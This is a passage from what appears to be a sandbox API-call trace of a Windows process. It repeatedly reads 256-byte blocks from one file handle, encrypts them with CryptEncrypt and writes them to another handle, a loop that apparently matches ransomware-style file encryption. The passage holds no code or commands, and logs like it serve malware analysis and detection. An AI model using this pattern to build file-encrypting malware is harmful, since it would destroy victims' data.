(in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.047] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.047] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.047] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.047] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.047] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.047] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.047] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.047] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.047] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.047] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.047] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.047] GetLastError () returned 0x0 [0168.047] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.047] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.048] GetLastError () returned 0x0 [0168.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.048] GetLastError () returned 0x0 [0168.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.048] GetLastError () returned 0x0 [0168.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.048] GetLastError () returned 0x0 [0168.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.048] GetLastError () returned 0x0 [0168.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.048] GetLastError () returned 0x0 [0168.048] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.048] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.048] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.049] GetLastError () returned 0x0 [0168.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.049] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.049] GetLastError () returned 0x0 [0168.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.049] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.049] GetLastError () returned 0x0 [0168.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.049] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.049] GetLastError () returned 0x0 [0168.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.049] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.049] GetLastError () returned 0x0 [0168.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.049] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.049] GetLastError () returned 0x0 [0168.049] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.049] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.049] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.050] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.050] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.050] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.050] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.050] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.050] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.050] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.050] GetLastError () returned 0x0 [0168.050] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.051] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.051] GetLastError () returned 0x0 [0168.051] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.051] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.051] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 